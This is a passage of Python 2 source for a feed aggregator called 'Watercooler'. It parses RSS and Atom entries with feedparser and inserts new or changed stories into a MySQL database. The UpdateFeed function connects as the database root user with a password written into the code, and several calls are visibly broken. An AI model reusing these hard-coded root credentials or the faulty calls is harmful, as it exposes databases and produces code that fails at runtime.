myfeed.entries[count].date_parsed\n\t\t\tUNIX_time = int(time.mktime(date_parsed))\n\t\telif myfeed.feed.has_key('date'):\n\t\t\tdate_parsed = myfeed.feed.date_parsed\n\t\t\tUNIX_time = int(time.mktime(date_parsed))\n\n\t\tif ((UNIX_time == 0) or (UNIX_time > latest_ts)):\n\t\t\tif (debug):\n\t\t\t\tf.write('Entry ' + str(count+1) + ' Information:\\n')\n\t\t\t\tf.write('Feed Title: ' + feedtitle + '\\n')\n\t\t\t# get entry title\n\t\t\tentrytitle = 'Undefined'\n\t\t\tif myfeed.entries[count].has_key('title'):\n\t\t\t\tentrytitle = myfeed.entries[count].title\n\t\t\t\tentrytitle = unicodedata.normalize('NFKD', entrytitle).encode('ascii','ignore')\n\n\t\t\t\tif (debug):\n\t\t\t\t\tf.write('Entry Title: '+ entrytitle + '\\n')\n\t\t\telse:\n\t\t\t\tif (debug):\n\t\t\t\t\tf.write('Entry Title: Undefined' + '\\n')\n\t\t\t\tlog.write('Entry ' + str(count+1) + ' error: Entry title = Undefined\\n')\n\n\t\t\tentrytitle_list.append(entrytitle)\n\n\t\t\t# process content info (clear out HTML codes)\n\t\t\tcontent = myfeed.entries[count].description\n\n\t\t\tcontent = _ContentCutter(content)\n\t\t\tcontent = unicodedata.normalize('NFKD', content).encode('ascii','ignore')\n\t\t\tif (debug):\n\t\t\t\tf.write('Content: ' + content + '\\n')\n\n\t\t\t# get entry URL\n\t\t\tentryURL = ''\n\t\t\tif (myfeed.entries[count].has_key('link') and (len(myfeed.entries[count].link) != 0)):\n\t\t\t\tentryURL = myfeed.entries[count].link\n\t\t\t\tentryURL = unicodedata.normalize('NFKD', entryURL).encode('ascii','ignore')\n\t\t\telif 
(myfeed.entries[count].has_key('id') and (len(myfeed.entries[count].id) != 0)):\n\t\t\t\tentryURL = myfeed.entries[count].id\n\t\t\t\tentryURL = unicodedata.normalize('NFKD', entryURL).encode('ascii','ignore')\n\t\t\telse:\n\t\t\t\tentryURL = 'localhost'\n\t\t\t\tlog.write('Entry ' + str(count+1) + ' error: entryURL = localhost\\n')\n\n\t\t\tif (debug):\n\t\t\t\tf.write('Entry URL: ' + entryURL + '\\n')\n\n\t\t\tentryURL_list.append(entryURL)\n\n\t\t\t# write date of entries\n\t\t\tif (debug):\n\t\t\t\tf.write('Time Stamp: ' + str(UNIX_time) + '\\n')\n\t\t\t\tif (UNIX_time != 0):\n\t\t\t\t\tf.write('Time Stamp GMT DEBUG: ' + str(date_parsed[0]) + '/' + str(date_parsed[1]) + '/' + \\\n\t\t\t\t\tstr(date_parsed[2]) + ' ' + str(date_parsed[3]) + ':' + str(date_parsed[4]) + '\\n\\n')\n\t\t\t\telse:\n\t\t\t\t\tf.write('Time Stamp: 0\\n\\n')\n\t\t\tif (UNIX_time == 0):\n\t\t\t\tlog.write('Entry ' + str(count+1) + ' error: Time Stamp = 0\\n')\n\n\t\t\tentry_ts_list.append(UNIX_time)\n\n\t\t\t# make a story from above parsed content\n\t\t\t# story is [Feed Title, Feed URL, [Entry Titles], [Entry Contents], [Entry Categories], [Entry URLs], [Entry Timestamps]]\n\t\t\tif content == '':\n\t\t\t\tcontent = 'Feed brought to you by the Watercooler'\n\t\t\tentrycontent_list.append(content)\n\t\t\tentrycategory_list.append('Undefined')\n\t# end for ---------------------------------------------------------------------------------------------------------\n\tif (len(entry_ts_list) > 0):\n\t\tstory = [feedtitle, feedurl, entrytitle_list, entrycontent_list, entrycategory_list, entryURL_list, entry_ts_list]\n\n\t# CONSISTENCY CHECK\n\tcon1 = len(entrytitle_list)\n\tcon2 = len(entrycontent_list)\n\tcon3 = len(entrycategory_list)\n\tcon4 = len(entryURL_list)\n\tcon5 = len(entry_ts_list)\n\tif ((con1 != con2) or (con1 != con3) or (con1 != con4) or (con1 != con5)):\n\t\tprint 'CONSISTENCY CHECK FAILED IN RSS STORY '\n\t\tprint 'STORY IS:'\n\t\tprint str(story)\n\t\tprint '\\n'\n\n\treturn story\n\n\n# a specialized function to parse and process ATOM feeds\n#\tinput: f = local file to write to\n#\t\t log = local log for error\n#\t\t myfeed = feedparser parsed object\n# latest_ts = latest time stamp, of all feeds in the database\n# feedurl = the URL of the feed\n# output: A story, containing all new entries, as:\n# [Feed Title, Feed URL, [Entry Titles], [Entry Contents], [Entry Categories], [Entry URLs], [Entry Timestamps]]\n# Note, for no new entries, the output will be [] AND NOT:\n# [Feed Title, Feed URL, [], [], [], [], []]\n\ndef _ATOM(f, log, myfeed, latest_ts, feedurl, debug):\n\t# initialize the story, and corresponding entries lists\n\t# story is [Feed Title, Feed URL, [Entry Titles], [Entry Contents], [Entry Categories], [Entry URLs], [Entry Timestamps]]\n\tstory = []\n\tentrytitle_list = []\n\tentrycontent_list = []\n\tentrycategory_list = []\n\tentryURL_list = []\n\tentry_ts_list = []\n\n\tif ((myfeed is None) or (myfeed.feed is None)):\n\t\treturn story\n\n\t# calculate how many \"entries\" in the feed\n\tn_entries = len(myfeed['entries'])\n\n\t# print details of the feeds (global):\n\tif (debug):\n\t\t_DisplayGlobal(myfeed,'ATOM')\n\n\t# get feed title\n\tfeedtitle = 'Undefined'\n\tif myfeed.feed.has_key('title'):\n\t\tfeedtitle = myfeed.feed.title\n\t\tfeedtitle = unicodedata.normalize('NFKD', feedtitle).encode('ascii','ignore')\n\t\tfeedtitle = feedtitle[:240]\n\tprint 'Feed Title:', feedtitle\n\n\tprint 'LC DEBUG LATEST_TS IN ATOM', str(latest_ts)\n
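\t# For reference: feedparser exposes 'updated_parsed'/'published_parsed' as\n\t# time.struct_time tuples, and int(time.mktime(t)) converts such a tuple\n\t# into seconds since the epoch, interpreted in the server's local timezone.\n\t# write all entries parsed on local file\n\tfor 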
count in range(n_entries):\n\t\t# check time_stamp of the entry before proceeding\n\t\t# to avoid processing something we will trash!\n\t\t# convert Universal Feed Parser generated time (tuple) into UNIX time\n\t\tUNIX_time = 0\n\t\tif myfeed.entries[count].has_key('updated'):\n\t\t\tdate_parsed = myfeed.entries[count].updated_parsed\n\t\t\tUNIX_time = int(time.mktime(date_parsed))\n\t\telif myfeed.entries[count].has_key('published'):\n\t\t\tdate_parsed = myfeed.entries[count].published_parsed\n\t\t\tUNIX_time = int(time.mktime(date_parsed))\n\n\n\t\tif ((UNIX_time == 0) or (UNIX_time > latest_ts)):\n\t\t\tif (debug):\n\t\t\t\tf.write('Entry ' + str(count+1) + ' Information:\\n')\n\t\t\t\tf.write('Feed Title: ' + feedtitle + '\\n')\n\t\t\t# get entry title\n\t\t\tentrytitle = 'Undefined'\n\t\t\tif myfeed.entries[count].has_key('title'):\n\t\t\t\tentrytitle = myfeed.entries[count].title\n\t\t\t\tentrytitle = unicodedata.normalize('NFKD', entrytitle).encode('ascii','ignore')\n\t\t\t\tif (debug):\n\t\t\t\t\tf.write('Entry Title: '+ entrytitle + '\\n')\n\t\t\telse:\n\t\t\t\tif (debug):\n\t\t\t\t\tf.write('Entry Title: Undefined' + '\\n')\n\t\t\t\tlog.write('Entry ' + str(count+1) + ' error: Entry title = Undefined\\n')\n\n\t\t\tentrytitle_list.append(entrytitle)\n\n\t\t\t# ---------- Retrieve content info ------------\n\t\t\tpos = 0\n\t\t\t# intialize content variable to empty string (very useful)\n\t\t\tcontent = ''\n\n\t\t\t# get content from description field first, if possible\n\t\t\tcontent = myfeed.entries[count].description\n\n\t\t\t# if the content is empty, try to get in content field (atom specific)\n\t\t\tif content == '':\n\t\t\t\t# when entries[count] has content, get the content out\n\t\t\t\tif myfeed.entries[count].has_key('content'):\n\t\t\t\t\tfor content_index in range(len(myfeed.entries[count].content)):\n\t\t\t\t\t\tcontent = myfeed.entries[count].content[content_index].value\n\t\t\t\t\t\tif len(content) != 0:\n\t\t\t\t\t\t\tbreak\n\n\t\t\t# when content field also empty string, we cannot do anything more\n\t\t\tif content == '':\n\t\t\t\tlog.write('Entry ' + str(count+1) + ' error: Content is empty\\n')\n\t\t\telse:\n\t\t\t\t# ---------- Process content (clear out HTML codes) ---------------\n\t\t\t\tif (False):\n\t\t\t\t\tcontent = _ContentCutterD(content)\n\t\t\t\telse:\n\t\t\t\t\tcontent = _ContentCutter(content) # this is original required\n\n\t\t\tcontent = unicodedata.normalize('NFKD', content).encode('ascii','ignore')\n\t\t\tif (debug):\n\t\t\t\tf.write('Content: ' + content + '\\n')\n\n\n\t\t\t# get entry URL (ID first, before LINK)\n\t\t\t# this order seems more correct in ATOM feeds\n\t\t\tentryURL = ''\n\t\t\tif (myfeed.entries[count].has_key('id') and (len(myfeed.entries[count].id) != 0)):\n\t\t\t\tentryURL = myfeed.entries[count].id\n\t\t\t\tentryURL = unicodedata.normalize('NFKD', entryURL).encode('ascii','ignore')\n\t\t\telif (myfeed.entries[count].has_key('link') and (len(myfeed.entries[count].link) != 0)):\n\t\t\t\tentryURL = myfeed.entries[count].link\n\t\t\t\tentryURL = unicodedata.normalize('NFKD', entryURL).encode('ascii','ignore')\n\t\t\telse:\n\t\t\t\tentryURL = 'localhost'\n\t\t\t\tlog.write('Entry ' + str(count+1) + ' error: entryURL = localhost\\n')\n\n\t\t\tif (debug):\n\t\t\t\tf.write('Entry URL: ' + entryURL + '\\n')\n\n\t\t\tentryURL_list.append(entryURL)\n\n\t\t\t# write date of entries\n\t\t\tif (debug):\n\t\t\t\tf.write('Time Stamp: ' + str(UNIX_time) + '\\n')\n\t\t\t\tf.write('Time Stamp GMT DEBUG: ' + str(date_parsed[0]) + '/' + 
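The Atom content fall-back above (description first, then the first non-empty value among the entry's content blocks) condenses to a small accessor. A sketch assuming feedparser's usual shapes, where entry.content is a list of objects carrying a value field (first_content is a hypothetical helper):

def first_content(entry):
    """Return the first non-empty body for an entry, else ''."""
    text = entry.get('description') or ''
    if not text:
        # Atom entries may carry several content blocks; take the first
        # with a non-empty value, as the loop above does.
        for block in entry.get('content', []):
            if block.get('value'):
                text = block['value']
                break
    return text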
str(date_parsed[1]) + '/' + \\\n\t\t\t\tstr(date_parsed[2]) + ' ' + str(date_parsed[3]) + ':' + str(date_parsed[4]) + '\\n\\n')\n\n\t\t\tif (UNIX_time == 0):\n\t\t\t\tif (debug):\n\t\t\t\t\tf.write('Time Stamp: 0\\n\\n')\n\t\t\t\tlog.write('Entry ' + str(count+1) + ' error: Time Stamp = 0\\n')\n\n\t\t\tentry_ts_list.append(UNIX_time)\n\n\t\t\t# make a story from above parsed content\n\t\t\t# story is [Feed Title, Feed URL, [Entry Titles], [Entry Contents], [Entry Categories], [Entry URLs], [Entry Timestamps]]\n\t\t\tif content == '':\n\t\t\t\tcontent = 'Feed brought to you by the Watercooler'\n\t\t\tentrycontent_list.append(content)\n\t\t\tentrycategory_list.append('Undefined')\n\t# end for ---------------------------------------------------------------------------------------------------------\n\tif (len(entry_ts_list) > 0):\n\t\tstory = [feedtitle, feedurl, entrytitle_list, entrycontent_list, entrycategory_list, entryURL_list, entry_ts_list]\n\n\t# CONSISTENCY CHECK\n\tcon1 = len(entrytitle_list)\n\tcon2 = len(entrycontent_list)\n\tcon3 = len(entrycategory_list)\n\tcon4 = len(entryURL_list)\n\tcon5 = len(entry_ts_list)\n\tif ((con1 != con2) or (con1 != con3) or (con1 != con4) or (con1 != con5)):\n\t\tprint 'CONSISTENCY CHECK FAILED IN ATOM STORY '\n\t\tprint 'STORY IS:'\n\t\tprint str(story)\n\t\tprint '\\n'\n\n\treturn story\n\n\n# This is deprecated UpdateFeed, only useful to test output of ONE URL\n# THIS IS LOCAL TEST, NO modification to database is performed\ndef UpdateFeed_tester():\n\t# create object myfeed, which stores information of parsed CNN top stories RSS\n\t# WORKING Flawlessly:\n\t# nicely regular RSS feed, easy to process HTML codes (5.3 Verified)\n\tmyfeed_all = []\n\tmyfeed = feedparser.parse('cnn_topstories.rss')\n\tmyfeed_all.append(myfeed)\n\tmyfeed = feedparser.parse('cnn_world.rss')\n\tmyfeed_all.append(myfeed)\n\tmyfeed = feedparser.parse('ESPN_com.xml')\n\tmyfeed_all.append(myfeed)\n\tmyfeed = feedparser.parse('world.xml')\n\tmyfeed_all.append(myfeed)\n\t# myfeed = feedparser.parse('http://sports.espn.go.com/espn/rss/news')\n\n\t# atom feed, strangely formatted, but it is working (5.3 Verified)\n\tmyfeed = feedparser.parse('NYT_Home_Page.xml')\n\tmyfeed_all.append(myfeed)\n\n\t# RSS feed, contain empty entry, but it is required to retain them (it shows in real feed!)\n\tmyfeed = feedparser.parse('News_Toms_Hardware_US.xml')\n\tmyfeed_all.append(myfeed)\n\n\t# RSS feed, working, but contain some styles that may crash email server\n\tmyfeed = feedparser.parse('cnn_topstories_bug.rss')\n\tmyfeed_all.append(myfeed)\n\n\t# Most entries \"work\" in these, some \"not work\" is basically something we cannot do.\n\t# The ads contain legal ending syntax that we cannot differentiate them\n\t# consider email SPAM filtering. 
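_RSS prefers link over id when choosing an entry URL while _ATOM prefers id over link; the shared pattern differs only in the probe order, so it can be written once with the preference as a parameter. A sketch keeping the 'localhost' sentinel used above (entry_url is a hypothetical helper):

def entry_url(entry, preference):
    """Return the first non-empty identifier field, else 'localhost'."""
    for field in preference:       # ('link', 'id') for RSS,
        value = entry.get(field)   # ('id', 'link') for Atom
        if value:
            return value
    return 'localhost'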
We are very conservative, ensuring correctness.\n\t# Possibility of performance issue, used 1 sec to process\n\t# if you want \"more working\" version, we can implement more aggressive filter\n\t# techniques, such as, disgard all information afterwards which is seperated by \n\t# 2 \\n in a row, regardless of whats the characters in front\n\t# NOTE THIS AGGRESSIVE METHOD WILL BREAK RSS WITH FORMATS, since they\n\t# appear to have many \\n after parsed and removed HTMLs\n\tmyfeed = feedparser.parse('cardriver_blog.xml')\n\tmyfeed_all.append(myfeed)\n\t\n\tmyfeed = feedparser.parse('invalidurl')\n\tmyfeed_all.append(myfeed)\n\n\tmyfeed = feedparser.parse('www.yahoo.com')\n\tmyfeed_all.append(myfeed)\n\n\tmyfeed = feedparser.parse('')\n\tmyfeed_all.append(myfeed)\n\n\t# NOT WORKING:\n\n\t# Possibility of performance issue, used 2 sec to process (over 300 entries)\n\t# some hyperlink ads remaining. We cannot do anything as those are \"near content\"\n\t# ads. We human are smart enough to comprehend the semantics!\n\t# some HTML code remains: &nbsp;\n\t# plan to remove it in the future\n\t# myfeed = feedparser.parse('http://www.rss-specifications.com/blog-feed.xml')\n\n\t# LC testing only\n\n\t# myfeed = feedparser.parse('http://feedparser.org/docs/examples/rss20.xml')\n\t# myfeed = feedparser.parse('http://feeds.feedburner.com/SlickdealsnetFP')\n\t# myfeed = feedparser.parse('http://rssfeeds.s3.amazonaws.com/goldbox')\n\t# myfeed = feedparser.parse('http://www.census.gov/mp/www/cpu/index.xml')\n\n\t# create a local temp file that store all parsed content for demostration purpose\n\t# firstly, check for feeds encoding and synchronize this information\n\tfilename_counter = 1\n\t#latest_ts = 1\n\t# May 21, 00:00 GMT\n\tlatest_ts = 1274400000\n\ttotal_stories = 0\n\tfor onefeed in myfeed_all:\n\t\tfilename = 'feed_test' + str(filename_counter) + '.txt'\n\t\tf = codecs.open(filename, encoding=onefeed.encoding, mode='w')\n\n\t\t# create a local log for indicating error\n\t\terrlog = open(\"ERRORLOG_testall.txt\", mode ='a')\n\n\t\t# display global feed information that shared across all entries\n\t\tprint 'Feed Encoding: ', onefeed.encoding\n\t\tprint 'Feed version (type): ', onefeed.version\n\n\t\t# run specified parser corresponding to type of feeds (RSS,atom,others)\n\t\tdebug = True\n\t\t#print '-----', type(onefeed.version)\n\t\t#if (onefeed.version is None):\n\t\t#\tprint 'LC CHECK DEBUG'\n\t\tif ((onefeed.version is not None) and (onefeed.has_key('version')) and (onefeed.version[:3] == \"rss\")):\n\t\t\tprint 'VERBOSE: RSS feed detected!'\n\t\t\tstories = _RSS(f, errlog, onefeed, latest_ts, debug)\n\t\telif ((onefeed.version is not None) and (onefeed.has_key('version')) and (onefeed.version[:4] == \"atom\")):\n\t\t\tprint 'VERBOSE: ATOM feed detected!'\n\t\t\tstories = _ATOM(f, errlog, onefeed, latest_ts, debug)\n\t\telse:\n\t\t\tstories = []\n\t\t\tprint 'UNKNOWN feed type! 
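Two notes on the rss/atom dispatch above. First, feedparser normally sets .version to an empty string when it cannot identify the format, so the combined has_key/None guards are belt and braces; the decisive test is the version prefix. Second, the deprecated tester calls _RSS and _ATOM without the feedurl argument their current signatures require, so those calls would raise a TypeError as written. A compact classifier sketch (feed_kind is a hypothetical helper):

def feed_kind(parsed):
    """Classify a feedparser result as 'rss', 'atom', or 'unknown'."""
    version = parsed.get('version') or ''
    if version.startswith('rss'):
        return 'rss'
    if version.startswith('atom'):
        return 'atom'
    return 'unknown'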
Probably invalid URL'\n\t\tfilename_counter = filename_counter + 1\n\t\ttotal_stories = total_stories + len(stories[5])\n\n\tf.close()\n\t# print stories\n\t# return stories\n\tprint 'Processed ', total_stories, ' stories!'\n\treturn\n\ndef UpdateFeed():\n\t# DEBUG FLAG, LC DEBUG\n\tdebug = False\n\t# create a local log for indicating error\n\terrlog = open(\"ERRORLOG.txt\", mode ='a')\n\t# print 'UPDATEFEED STARTED AT 997 \\n'\n\t# connect to the database\n\tconn = MySQLdb.connect (host = \"localhost\", user = \"root\", passwd = \"adminsql\", db = \"watercooler\")\n\n\t# Get last updated time: latest_ts\n\tcursor = conn.cursor ()\n\tcursor.execute (\"\"\"\n\t\tSELECT feed_sources.source_name, feed_stories.time_stamp\n\t\tFROM feed_stories, feed_sources, (SELECT feed_sources.sid AS source_id\n\t\t\t\t\t\tFROM feed_stories, feed_sources\n\t\t\t\t\t\tWHERE feed_stories.sid = feed_sources.sid\n\t\t\t\t\t\tGROUP BY feed_sources.sid\n\t\t\t\t\t\tHAVING MAX(time_stamp)) AS source_filter\n\t\tWHERE feed_stories.sid = feed_sources.sid\n\t\tAND feed_sources.sid = source_filter.source_id\n\t\tORDER BY feed_stories.time_stamp DESC;\n\t\t\"\"\")\n\n\ttimestamp_list = cursor.fetchall ()\n\t# first item is the latest time!\n\t###(myfeed.entries[count].has_key('updated')\t\n\tlatest_ts = 0\n\tif (len(timestamp_list) > 0):\n\t\tlatest_ts_tuple = timestamp_list[0]\n\t\tlatest_ts = latest_ts_tuple[1]\n\telse:\n\t\tprint ('TimeStamp POS Trapped 1, potential bug if not initial!')\n\t\tlatest_ts = 1\n\n\tcursor.close ()\n\n\n\t# get a list of URL, source_URLs\n\tcursor1 = conn.cursor ()\n\tcursor1.execute (\"\"\"\n\t\tSELECT DISTINCT source_name, source_url\n\t\tFROM feed_sources\n\t\tORDER BY source_name;\n\t\t\"\"\")\n\tsources_list = cursor1.fetchall ()\n\tif (len(sources_list) == 0):\n\t\tprint ('INVALID SOURCE URL LIST, refer to log file!')\n\t\terrlog.write ('INVALID SOURCE URL LIST: LENGTH 0\\n')\n\t\tcursor1.close ()\n\t\tconn.close ()\n\t\treturn []\n\n\tsource_URLs = []\n\tfor source_item in sources_list:\n\t\tsource_item_url = source_item[1]\n\t\tsource_URLs.append(source_item_url)\n\n\tcursor1.close ()\n\n\n\t# for each URL in the URL list, parse things.....\n\tfilename_counter = 0\n\tall_stories = []\n\n\tfor source_URL in source_URLs:\n\t\tmyfeed = feedparser.parse(source_URL)\n\n\t\t# get feed title and update feed title to database, if not null\n\t\t# we first get feed sid by URL, then update the title with sid\n\t\tsource_feed_title = 'Undefined'\n\t\tif ((myfeed is not None) and (myfeed.feed is not None) and (myfeed.feed.has_key('title'))):\n\t\t\tsource_feed_title = myfeed.feed.title\n\t\t\tsource_feed_title = unicodedata.normalize('NFKD', source_feed_title).encode('ascii','ignore')\n\t\t\tsource_feed_title = source_feed_title[:240]\n\t\t\tif (len(source_feed_title) > 0):\n\t\t\t\tcursor_title = conn.cursor ()\n\t\t\t\tcursor_title.execute (\"\"\"\n SELECT sid\n FROM feed_sources\n\t\t\t\t\t\tWHERE source_url = (%s);\n \"\"\", (source_URL))\n\t\t\t\tfeed_sid_tuple = cursor_title.fetchone ()\n\t\t\t\tif (len(feed_sid_tuple) > 0):\n\t\t\t\t\tfeed_sid = feed_sid_tuple[0]\n\t\t\t\t\tcursor_update_title = conn.cursor ()\n\t\t\t\t\tcursor_update_title.execute (\"\"\"\n\t\t\t\t\t\t\tUPDATE feed_sources\n\t\t\t\t\t\t\tSET source_name = (%s)\n\t\t\t\t\t\t\tWHERE sid = (%s);\n\t\t\t\t\t\t\t\"\"\", (source_feed_title, feed_sid))\n\n\t\t\t\t\tcursor_update_title.close ()\n\t\t\t\tcursor_title.close ()\n\t\t\t\tif (len(feed_sid_tuple) > 0):\n\t\t\t\t\tconn.commit ()\n\t\t\telse:\n\t\t\t\tprint 'NULL feed 
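Only the first row of timestamp_list is consumed above, and the grouped subquery's HAVING MAX(time_stamp) clause tests the truthiness of the maximum rather than comparing it to anything, so the whole lookup reduces to a single aggregate. A hedged sketch of the simpler query, keeping the 1-as-floor convention for an empty table (latest_timestamp is a hypothetical helper; table and column names are taken from the query above):

def latest_timestamp(conn):
    """Newest story timestamp in feed_stories, or 1 when there are none."""
    cursor = conn.cursor()
    cursor.execute("SELECT MAX(time_stamp) FROM feed_stories;")
    row = cursor.fetchone()
    cursor.close()
    # MySQL returns one row containing NULL for MAX() over an empty table.
    return row[0] if (row is not None and row[0] is not None) else 1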
title detected, cannot update database for URL: ' , source_URL, '\\n'\n\t\t\t\terrlog.write('NULL feed title detected, cannot update database for URL: ', source_URL, '\\n')\n\n\n\t\t# create a local temp file that store all parsed content for demostration purpose\n\t\t# firstly, check for feeds encoding and synchronize this information\n\t\t# f = open(\"feeds.txt\", \"w\")\n\n\t\tif (debug):\n\t\t\tfilename = 'feed' + str(filename_counter) + '.txt'\n\t\t\tf = codecs.open(filename, encoding=myfeed.encoding, mode='a')\n\t\telse:\n\t\t\tf = codecs.open('placeholder_feed.txt', encoding=myfeed.encoding, mode='a')\n\n\t\tif (debug):\n\t\t\t# display global feed information that shared across all entries\n\t\t\tprint 'Feed Encoding: ', myfeed.encoding\n\t\t\tprint 'Feed version (type): ', myfeed.version\n\n\t\t# run specified parser corresponding to type of feeds (RSS,atom,others)\n\t\tif ((myfeed.version is not None) and (myfeed.has_key('version')) and (myfeed.version[:3] == \"rss\")):\n\t\t\tif (debug):\n\t\t\t\tprint 'VERBOSE: RSS feed detected!'\n\t\t\tstories = []\n\t\t\tstories = _RSS(f, errlog, myfeed, latest_ts, source_URL, debug)\n\t\t\t\n\t\telif ((myfeed.version is not None) and (myfeed.has_key('version')) and (myfeed.version[:4] == \"atom\")):\n\t\t\tif (debug):\n\t\t\t\tprint 'VERBOSE: ATOM feed detected!'\n\t\t\tstories = []\n\t\t\tstories = _ATOM(f, errlog, myfeed, latest_ts, source_URL, debug)\n\n\t\telse:\n\t\t\tif (debug):\n\t\t\t\tprint 'UNKNOWN feed type! Probably invalid URL'\n\t\t\tstories = []\n\n\t\tf.close()\n\t\t#print 'LC DEBUG 1125, STORY:'\n\t\t#print str(stories)\n\t\t#print '\\n'\n\t\tall_stories.append(stories)\n\t\tfilename_counter = filename_counter + 1\n\n\t# now i have a big list of stories: all_stories (list of many story)\n\t# story is [Feed Title, Entry Title, Entry Content, Entry Category, Entry URL, Entry Timestamp]\n\n\t# Process the List List:\n\t# \tComparing the time stamp of each story with \"newest\" time stamp obtained\n\t# \tremove all old story\n\tprocessed_stories = []\n\t\"\"\"\n\tfor r_story in all_stories:\n\t\tr_story_ts = r_story[5]\n\t\tif (r_story_ts > latest_ts):\n\t\t\tprocessed_stories.append(r_story)\n\t\"\"\"\n\t# now I have a processed list of stories as processed_stories\n\t# get list of IDs... 
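Two observations on the title-update path above. file.write accepts a single string, so the comma-separated errlog.write call in the NULL-title branch would raise a TypeError if that branch were ever reached (concatenation or formatting is needed there). And since source_url is what locates the row in the first place, the SELECT-sid-then-UPDATE pair can collapse into one parameterized statement; a sketch (update_source_title is a hypothetical helper):

def update_source_title(conn, source_url, title):
    """Record a feed's self-reported title, clamped to the column width."""
    cursor = conn.cursor()
    cursor.execute(
        "UPDATE feed_sources SET source_name = %s WHERE source_url = %s;",
        (title[:240], source_url))
    cursor.close()
    conn.commit()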
sources_id_list\n\tcursor2 = conn.cursor ()\n\tcursor2.execute (\"\"\"\n SELECT DISTINCT sid, source_url\n FROM feed_sources\n ORDER BY sid;\n \"\"\")\n\tsources_id_list = cursor2.fetchall ()\n\n\t# story is [Feed Title, Feed URL, [Entry Titles], [Entry Contents], [Entry Categories], [Entry URLs], [Entry Timestamps]]\n\tcursor3 = conn.cursor ()\n\tcursor_chkexist = conn.cursor ()\n\n\t\"\"\"\n\t# LC DEBUG: DISPLAY ALL PROCESSED_STORIES\n\tdebug_counter0 = 0\n\tfor p_story in processed_stories:\n\t\tdebug_counter = 0\n\t\tfor item in p_story:\n\t\t\tprint 'STORY ', debug_counter0, 'Field ' , debug_counter, ': ', item\n\t\t\tdebug_counter = debug_counter + 1\n\t\tdebug_counter0 = debug_counter0 + 1\n\t\"\"\"\n\t#print 'LC DEBUG 1170, ALL STORIES '\n\t#print str(all_stories)\n\t#print '\\n'\n\t#print 'LC DEBUG 1171, LENGTH ', str(len(all_stories))\n\t#print '\\n'\n\tfor p_story in all_stories:\n\t\t# holdings var for each p_story...\n\t\tlist_title = []\n\t\tlist_content = []\n\t\tlist_category = []\n\t\tlist_URL = []\n\t\tlist_ts = []\n\t\t#print 'LC CHECK 1 ARRIVAL, PER STORY START' # LC DEBUG\n\t\t# loop to check against feed URL\n\t\t#print 'LC DEBUG 1176, P_STORY '\n\t\t#print str(p_story)\n\t\t#print '\\n'\n\t\t#sys.stdout.flush()\n\t\tmysid = 0\n\t\tif (len(p_story) > 0):\n\t\t\tfor id_list in sources_id_list:\n\t\t\t\tif (id_list[1][:240] == p_story[1][:240]):\n\t\t\t\t\tmysid = id_list[0] \n\t\t\t\t\tbreak\n\t\t\tif (mysid == 0):\n\t\t\t\tprint ('INVALID SID!, refer to log file! \\n')\n\t\t\t\terrlog.write ('INVALID SID: Processed STORY\\n')\n\t\t\t\terrlog.write(' FEED ENTRY TITLE IS:')\n\t\t\t\terrlog.write(p_story[1])\n\t\t\t\terrlog.write('\\n')\n\t\t\t\tcursor_chkexist.close ()\n\t\t\t\tcursor2.close()\n\t\t\t\tcursor3.close()\n\t\t\t\tconn.commit()\n\t\t\t\tconn.close()\n\t\t\t\treturn []\n\t\t\t# for each entry in the story...\n\t\t\tfor iteration in (range(len(p_story[6]))):\n\t\t\t\t# check existence of entry\n\t\t\t\tcursor_chkexist.execute(\"\"\"\n\t\t\t\t\tSELECT fid\n\t\t\t\t\tFROM feed_stories\n\t\t\t\t\tWHERE feed_stories.url = (%s);\n\t\t\t\t\t\"\"\", p_story[5][iteration][:240])\n\t\t\t\tentry_existence = cursor_chkexist.fetchall ()\n\n\t\t\t\t# story exist implies the len check > 0\n\t\t\t\tif (len(entry_existence) > 0):\n\t\t\t\t\t# check again if the content match\n\t\t\t\t\tcursor_getstory = conn.cursor ()\n\t\t\t\t\tcursor_getstory.execute (\"\"\"\n\t\t\t\t\t\t\t\tSELECT content\n\t\t\t\t\t\t\t\tFROM feed_stories\n\t\t\t\t\t\t\t\tWHERE feed_stories.url = (%s);\n\t\t\t\t\t\t\t\t\"\"\", p_story[5][iteration][:240])\n\t\t\t\t\tdb_story = cursor_getstory.fetchall ()\n\t\t\t\t\tcursor_getstory.close ()\n\t\t\t\t\tif (len(db_story) == 0):\n\t\t\t\t\t\tprint 'DEBUG 1093, db_story IS NULL:', db_story\n\t\t\t\t\telse:\n\t\t\t\t\t\tprint 'HERE IS db_story RETURNED: ', db_story\n\n\t\t\t\t\t# safety check\n\t\t\t\t\tif (len(db_story) == 0):\n\t\t\t\t\t\tprint 'DEBUG 1099, db_story is NULL when it should not be'\n\t\t\t\t\telse:\n\t\t\t\t\t\tif (len(db_story[0]) == 0):\n\t\t\t\t\t\t\tprint 'DEBUG 1102, db_story[0] is NULL when it should not be'\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tif (db_story[0][0][:240] != p_story[3][iteration][:240]):\n\t\t\t\t\t\t\t\t# add the entry to the list, as content does not 
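The duplicate handling above amounts to a three-way decision per entry: the URL is unseen, the stored content differs, or the entry is an exact duplicate (which is still deleted and re-inserted). Naming the decision keeps the bookkeeping in one place; a sketch preserving the 240-character prefix comparison used above (story_state is a hypothetical helper):

def story_state(cursor, url, new_content):
    """Classify a story URL as 'new', 'changed', or 'duplicate'."""
    cursor.execute(
        "SELECT content FROM feed_stories WHERE url = %s;", (url[:240],))
    row = cursor.fetchone()
    if row is None:
        return 'new'
    return 'duplicate' if row[0][:240] == new_content[:240] else 'changed'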
match\n\t\t\t\t\t\t\t\tlist_title.append(p_story[2][iteration][:240])\n\t\t\t\t\t\t\t\tlist_content.append(p_story[3][iteration][:240])\n\t\t\t\t\t\t\t\tlist_category.append(p_story[4][iteration][:240])\n\t\t\t\t\t\t\t\tlist_URL.append(p_story[5][iteration][:240])\n\t\t\t\t\t\t\t\tlist_ts.append(p_story[6][iteration])\n\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tprint 'DUPLICATE ENTRY DETECTED, CONTENT MATCHES'\n\t\t\t\t\t\t\t# delete that entry\n\t\t\t\t\t\t\tcursor_deletestory = conn.cursor ()\n\t\t\t\t\t\t\tcursor_deletestory.execute (\"\"\"\n\t\t\t\t\t\t\t\tDELETE FROM feed_stories\n\t\t\t\t\t\t\t\tWHERE feed_stories.url = (%s);\n\t\t\t\t\t\t\t\t\"\"\", p_story[5][iteration][:240])\n\t\t\t\t\t\t\tcursor_deletestory.close ()\n\t\t\t\t\t\t\tprint 'HERE I REPLACE TO DB: ----------------'\n\t\t\t\telse:\n\t\t\t\t\t# implies entry does not exist, add to 